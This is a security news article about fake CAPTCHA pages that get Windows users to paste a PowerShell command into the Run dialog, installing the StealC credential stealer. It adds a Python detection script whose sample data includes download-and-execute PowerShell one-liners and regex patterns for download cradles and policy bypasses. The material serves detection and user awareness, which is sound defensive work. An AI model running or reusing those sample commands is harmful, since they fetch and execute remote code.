Windows 11: Fake CAPTCHA Trick Installs StealC Infostealer
Time: Feb 20, 2026

Fake CAPTCHA Pages Used to Deliver Stealthy Malware

Security checks that users trust are being repurposed as malware traps. According to security researchers at LevelBlue, fake CAPTCHA pages walk users through a deceptive sequence of keystrokes that installs the StealC information stealer on Windows PCs. Once active, the malware harvests credentials from browsers, Outlook, Steam, and cryptocurrency wallets.

Malware Delivery Method

Attackers create pages that mimic normal verification prompts. Users encounter the familiar “I’m not a robot” CAPTCHA flow, followed by seemingly helpful but malicious “verification steps”.

  1. Victims are instructed to press the Win + R keyboard shortcut to open the Run dialog.
  2. Next, they are told to press Ctrl + V, which pastes the current clipboard contents into the dialog.
  3. Those contents are a malicious PowerShell command that the fake page has already written to the clipboard, so the victim never sees or types the command itself.
  4. Finally, pressing Enter runs the command, which starts the infection chain.

Researchers note that this method relies on user behavior and trusted interface patterns rather than on exploiting zero-day vulnerabilities. The page abuses nothing more than the Run dialog, the clipboard, and PowerShell, all of which are working as designed. As such, it is a behavioral attack rather than a classic software exploit.
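Because nothing is exploited, the most reliable signal is the behavior itself: explorer.exe (the parent of anything launched from the Run dialog) spawning PowerShell with a hidden window, an execution-policy bypass, an encoded command, or a download cradle, and the pasted command surviving in the RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), where Windows keeps a history of what was typed into Win + R. The following Python is an added example, not code from LevelBlue, CERT Polska, or the article; it scores constructed process-creation records and a constructed copy of the RunMRU values against those indicators. The field names, the indicator list, and every sample value are assumptions made for the example.

```python
"""Hunt for ClickFix-style Run-dialog launches of PowerShell.

Added example: scores simplified process-creation records (Sysmon Event ID 1
or Security 4688 style, field names assumed) and RunMRU registry values
against the indicators of a clipboard-pasted PowerShell one-liner.
"""
import re

# Indicator names and patterns (assumed for this example, not an official list).
SUSPICIOUS_ARGS = [
    ("hidden_window", re.compile(r"-(?:w|win|window|windowstyle)\s+h(?:idden)?\b", re.I)),
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("policy_bypass", re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|curl|wget)\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
]

LAUNCHERS = ("powershell.exe", "pwsh.exe")

# Constructed process-creation records; 203.0.113.0/24 is a documentation range.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr http://203.0.113.5/v.txt | iex"'},
    {"id": 2, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},  # user opened an interactive console: benign
    {"id": 3, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},  # admin script: benign
    {"id": 4, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": "pwsh -ep bypass -enc aQB3AHIAIABoAHQAdABwADoALwAvADIAMAAzAC4AMAAuADEAMQAzAC4ANQAvAGEA"},
]

# Constructed RunMRU values. Windows stores each Run-dialog entry under a
# single-letter value name with a trailing "\1"; MRUList gives the order,
# most recent first.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": 'powershell -w hidden -c "irm http://203.0.113.5/a | iex"\\1',
    "c": "\\\\fileserver\\share\\1",
}


def suspicious_args(cmdline):
    """Return the names of every indicator that matches the command line."""
    return [name for name, rx in SUSPICIOUS_ARGS if rx.search(cmdline)]


def classify_event(ev):
    """Return a finding for a PowerShell launch with suspicious arguments, else None."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    parent = ev["parent"].rsplit("\\", 1)[-1].lower()
    if image not in LAUNCHERS:
        return None
    hits = suspicious_args(ev["cmdline"])
    if not hits:
        return None
    # Anything typed into Win + R runs as a child of explorer.exe, which is
    # the lineage the fake CAPTCHA produces; other parents rank lower.
    severity = "high" if parent == "explorer.exe" else "medium"
    return {"id": ev["id"], "severity": severity, "indicators": hits}


def detect(events):
    """Run classify_event over a list of records and keep the findings."""
    return [f for f in (classify_event(e) for e in events) if f]


def run_mru_hits(values):
    """Return Run-dialog history entries that look like pasted payloads, newest first."""
    hits = []
    for key in values.get("MRUList", ""):
        cmd = values.get(key, "").removesuffix("\\1")
        if suspicious_args(cmd):
            hits.append(cmd)
    return hits


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
    for cmd in run_mru_hits(SAMPLE_RUNMRU):
        print("RunMRU:", cmd)
```

On a live host the same logic applies to the real event feed and to the RunMRU key read with `reg query` or `Get-ItemProperty`; the benign records above (an interactive console, a scheduled script) show why the rule keys on the argument indicators rather than on PowerShell alone.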

Focus on Credential Theft

Once installed, StealC prioritizes credential theft. It targets browser-stored passwords, cookies, and session tokens; stolen session cookies in particular let attackers sign in to services without knowing the password or passing a second factor. Additionally, it seeks to compromise:

  • Outlook credentials: exposing both personal and business communications.
  • Steam accounts: including stored payment details.
  • Cryptocurrency wallets: enabling direct financial theft.

This broad target set allows attackers to chain further malicious activities, such as resetting passwords using stolen email access, committing fraud, or performing identity theft using browser and wallet data.

An Ongoing Pattern

Researchers emphasize that this is not an isolated incident. Similar social-engineering tactics have been observed since 2024, indicating sustained interest from cybercriminals. CERT Polska reports an “increasing number of attacks” in Poland, pointing to active infrastructure and regional targeting. The trend suggests that attackers find the method effective enough to keep refining and expanding it.

Related campaigns include ClickFix activity, where fake Windows update prompts delivered information stealers through the same Win + R pattern. Earlier instances also involved fake CAPTCHA pages and counterfeit app lures, such as the delivery of Lumma Stealer. Together, these cases frame ClickFix as an evolving attack framework rather than a single campaign.

Expert Analysis and Recommendations

Windows Central brought this fake CAPTCHA wave to a mainstream audience, while security researchers at LevelBlue provided detailed technical analysis of the delivery mechanics and payload behavior. CERT Polska warns that a single successful click path can expose an entire network, because no software vulnerability is required for this type of attack. Patching alone cannot address the underlying issue.

Legitimate CAPTCHA flows never ask users to open the Run dialog or execute system commands. Any page that requests actions like Win + R, pasting from the clipboard, or running a command should be treated as malicious. Users encountering such prompts are advised to:

  • Immediately close the tab and avoid completing any of the steps.
  • Overwrite the clipboard by copying some harmless text, so a later accidental paste cannot run the payload.
  • If Enter was pressed, treat the device as compromised: run a full security scan, then reset passwords and sign out of active sessions for accounts saved in the browser, Outlook, Steam, and any cryptocurrency wallets, since those are exactly the stores StealC targets.

However, security tools may struggle to detect clipboard-driven social engineering in real time: attackers abuse legitimate OS functions (the Run dialog, the clipboard, PowerShell), so there is no malicious file or exploit to block before the command runs. As a result, user awareness remains a critical line of defense. Organizations should include this attack pattern in their security training so that employees recognize that valid websites never require command-line style verification steps.
